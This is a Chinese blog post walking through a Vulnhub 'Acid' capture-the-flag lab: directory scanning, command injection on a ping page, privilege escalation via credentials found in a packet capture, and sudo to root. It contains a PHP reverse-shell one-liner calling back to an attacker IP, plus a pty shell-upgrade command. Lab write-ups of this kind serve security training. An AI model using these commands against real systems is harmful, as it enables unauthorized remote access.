云尘-Acid

最新推荐文章于 2024-09-27 17:23:18 发布
最新推荐文章于 2024-09-27 17:23:18 发布
阅读量120 收藏
点赞数
分类专栏: 渗透 文章标签: chrome android 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134167772
版权
本文描述了一次在Vulhub靶场上进行渗透测试的过程,从基础的RCE(RemoteCodeExecution)利用,通过Python交互获取bashshell,再到发现并利用`saman`用户权限提升,最终获取flag。
摘要由CSDN通过智能技术生成

vulhub的靶场

直接开扫

开始信息收集

robots.txt啥都给我用上

有一个 解码看看

访问不上 学了别人的wp 通过 dirbustr跑 选择字典开冲!

但是真的巨慢!!!

然后最后扫下来

Challenge/Magic_Box/command.php

发现了这个目录

这不就ctf 的 ping的rce么 直接执行命令看看

这里如果我们需要反弹shell 就需要通过bp的url编码

;php -r '$sock=fsockopen("10.8.0.18",7777);exec("/bin/sh <&3 >&3 2>&3");'

成功咯

 

现在要干嘛呢 当然是提权 现在只是小小的www-data权限 这里我们首先看看能不能开启bash

启用python交互

python -c 'import pty;pty.spawn("/bin/bash")'

这个时候就可以看到正常的shell了

然后我们摸索一下

看看passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:104:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:105:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:107:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:110::/home/syslog:/bin/false
messagebus:x:105:112::/var/run/dbus:/bin/false
uuidd:x:106:113::/run/uuidd:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
ntp:x:108:117::/home/ntp:/bin/false
whoopsie:x:109:118::/nonexistent:/bin/false
acid:x:1000:1000:acid,,,:/home/acid:/bin/bash
mysql:x:111:126:MySQL Server,,,:/nonexistent:/bin/false
saman:x:1001:1001:,,,:/home/saman:/bin/bash
www-data@acid:/var/www/html/Challenge/Magic_Box$

没啥用呀

但是先过一遍 这里提醒先注意saman

然后我们可以发现 这里有我们的题目名 acid 那么好办了 看看存在什么文件是acid执行的

find / -user acid -type f 2>/dev/null

获取到咯 这个流量包 我们开启服务下回本机

python2版本


python -m SimpleHTTPServer 8888

然后我们就获取了流量包 开始wireshark 看

然后我们只看tcp 看看有没有存在什么交互

感觉有东西

这里不就出现了 saman  这里也看到了 面 1337hax0r 这个其实就是我们刚刚开始的那个界面的字符串 我们看看能不能提权了

成功咯

然后看看权限

sudo -l

发现全都有 那么直接sudo su了

出现咯

得到flag咯

双层小牛堡
关注
专栏目录
基于PHP的设云尘资讯网站设计与实现
程序猿麦小七
11-11 489
本系统设计是基于PHP的信息资讯网站的设计与实现,可以提供给用户便捷的平台。用PHP主流技术建设云尘资讯网站实现信息化的传播,采用THML以及CSS样式建立WEB网页,使得用户访问前端页面优美丰富,能够分享社会事迹、娱乐资讯、科学探究以及搞笑趣事等信息,充分的发挥现在信息化技术的优势,提供给用户闲暇时的阅读和了解,简单快速的获取自己想要的信息。使用到的工具和技术都是开源免费的。首页、登录注册、失物找寻、社会纪实、搞笑专栏、娱乐资讯、科学探究。网站首页、网站管理、内容管理、扩展管理、模板插件、系统管理。
Acid靶场实战
m0_65149086的博客
05-04 396
云尘靶场,靶机渗透,Vulhnub,Acid
云尘靶场-铁三域控
m0_64180167的博客
10-26 253
通过vpn链接 然后fscan扫描c段扫描出来三个ip存活 并且141存在永恒之蓝我们看看能不能直接复现按照原本的设置发现 提示这里需要通过32位来进行那我们开始设置然后我们开始利用利用失败 不知道于是我们开始看其他的吧 我们可以发现123 开放了 80端口去访问看看织梦cms 是有洞的首先不知道登录界面 我们开始扫目录这里sql文件我们去访问。
云尘-JIS-CTF-VulnUpload
m0_64180167的博客
10-30 104
发现只有success 但是我们刚刚robots存在upload 我们去看看。权限不够咯 要提权 并且上面提示我们去 technawi的密码。admin 页面源代码 第二个flag和账号密码。得到第三个了 这里提示我们读取flag文件。然后我们在最开始 可以知道 开起来了ssh。存在robots.txt 去看看。继续做渗透 一样给了c段 开扫。但是不能执行 去看看其他的。这里我们就获取了账号密码。存在一个站点 去看看。我们看看这个用户的文件。第一个flag出来了。所以我们可以链接看看。
云尘-Node1 js代码
m0_64180167的博客
11-02 937
还以为直接getshell了 老演员了 其实只是302跳转 所以我们无视 只有一个站 直接看就行了。这账号密码不就出来了 看看这个是啥加密 多半是hash 我们使用hash识别看看。扫出来了两个目录 但是没办法 都是要跳转 说明还是需要登入才可以。差不多就是base64解密 然后通过 file 识别为zip。然后再 去 app.js中查看ssh链接。然后通过爆破zip密码 获取源代码。源代码中也没有提示 奇了怪了。然后顺便fscan扫一下咯。可能是256 去解密看看。然后下载的时候靶场炸了。
云尘 -- 铁三域控
qq_44640313的博客
02-03 931
云尘靶场 -- 铁三域控 dedecms漏洞总结;MS17-010永恒之蓝漏洞利用;win32安装,windows 7
云尘-Potato(Suncsr)1 hydra破解ssh密码
m0_64180167的博客
11-01 148
获取到两个 80和 7120 80机会很多 22就一次 爆破弱口令 报完没有就去80测试。然后通过python 和 wget 下载执行。这里笨了 直接把c源代码送进去 gcc即可。然后我们首先看看/etc/passwd。提权成功 直接cat flag即可。发现没啥 看看内核 有没有poc。有的 这里我犯了错误 我直接通过。vulhub的题目 继续渗透吧。直接ssh链接getshell。我们依旧打开nmap 开扫。kali中的exp搜搜。
云尘-AI-Web-1.0
m0_64180167的博客
10-31 249
继续!开扫继续先测试websql注入 直接sqlmap跑通过注入 (sqlmap查询方式省略)存在systemuser 不知道会不会是电脑的密码 我们解密一下然后直接试试看然后失败 这里就没有思路了 但是我们刚刚存在一个目录 我们再扫扫看无果 换另一个目录扫出来了 /m3diNf0/info.php 去看看这下就开朗了因为这里可以获取 绝对路径 那么我们就可以直接通过 sqlmap进行getshell 这里介绍三种。
云尘靶场 --签到
2202_75317918的博客
11-06 265
ls。
netlimiter-4.0.41.0
01-03
netlimiter 4是最新版本的带宽分享和控制工具,可以有效地控制服务器或者个人计算机的带宽分配和控制,同时还可以有效地查看上行和下载带宽,让你对服务器的带宽有所了解。
JIS-CTF:VulnUpload实战靶机搭建及玩耍攻略
星|Donstpast
04-03 1837
最近玩了一把子vulnhub的volnupload靶机,需要完整找出五个flag,我格局小,只是为了得到flag,所以,本文或许基础知识不会很多。主要是想体验那种实战夺旗的feel。另外也相当预自己的一个笔记吧。 该靶机下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ 注:vulnhub中有很多优秀的实战靶机,自己可以下载下来去玩...
Apache Solr Remote Code Execution Via Velocity Custom Template (CVE-2019-17558)漏洞复现
千寻的博客
02-24 353
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备第一步 使用dockers搭建环境第二步 访问网站第三步 漏洞点查看第四步通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称:漏洞复现方法一:burp抓包方法二:Metasploit使用方法三:vulmap工具方法四: 工具利用修复建议笔记下载摘抄 漏洞名称 Apache Solr Remote Code Execution Via Velocity Custom Template
『VulnHub系列』WTF: 1-Walkthrough
ins1ght的博客
12-14 1752
这是个人完成的第27个VulnHub上的靶机。靶机发布日期:2019年11月22日,难度:中等。 标签:MiTM、/usr/bin/pip提权
Linux重定向
2401_83427936的博客
09-23 1288
将ls的输出写入output.txt,覆盖文件内容:bash将ls的输出追加到output.txt文件末尾:bash将错误输出到error.log,而标准输出保持在终端:bash丢弃命令的所有输出:bashLinux 重定向是管理输入输出的强大工具。通过标准输入、标准输出和标准错误的重定向,结合管道,可以方便地控制命令的 I/O 流,灵活处理输出结果或错误信息。bash解释:首先使用exec 3>创建文件描述符 3 并将其重定向到文件。然后,使用>&3将echo。
CentOS7 安装Selenium(使用webdriver_manager自动安装ChromeDriver)
sinat_41883985的博客
09-24 1036
通过以上步骤,应该能够在 CentOS 7 上成功安装并配置 Selenium。这个过程包括安装 Python 和 pip、安装 Selenium 库、安装相应的 WebDriver(如 ChromeDriver 或 GeckoDriver),以及测试配置。
网页护眼宝——全方位解析 Chrome Dark Reader 插件
恐龙弟旺仔的博客
09-24 1181
亮度(Brightness):调节页面整体的亮度,适应不同的光照环境。对比度(Contrast):调节文本与背景的对比度,提供清晰的阅读体验。饱和度(Sepia):将网页调节为暖色调,减少屏幕蓝光对眼睛的伤害。这些调整确保了用户可以根据个人偏好微调深色模式的外观。在设置面板中,你可以通过滑块调整亮度、对比度和饱和度等参数,优化深色模式效果。如果某些网站不需要深色模式,用户可以通过Site List功能将其添加到白名单。
CSS04-Chrome调试工具
qq_31532983的博客
09-24 330
Chrome调试工具
Chrome Cookie最大有效期
花开的博客
09-25 228
代码设置了cookie有效期是10年,但在浏览器上实际上发现只有一年多一点,查证后发现chrome对cookie的最大有效期做了限制(400)天,实际上99.9999%的场景也是可以满足的。
如何在iPad上用Chrome实现无痕浏览
最新发布
2403_86768603的博客
09-27 670
无痕浏览(Incognito Mode)是浏览器提供的一种隐私模式,允许用户在不保存浏览历史、Cookies和网站数据的情况下进行网页浏览。双击iPad的Home键(或在没有Home键的设备上,从屏幕底部向上滑动),查看最近使用的应用列表,并关闭不需要的应用。通过本文的介绍,你现在应该能够在iPad上熟练地使用Chrome浏览器的无痕浏览模式了。按住iPad的电源键,直到出现滑动关机的选项,然后滑动以关机。此时,你会看到一个新的标签页打开,并且地址栏会变成深色背景,同时显示“您已进入无痕浏览模式”。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值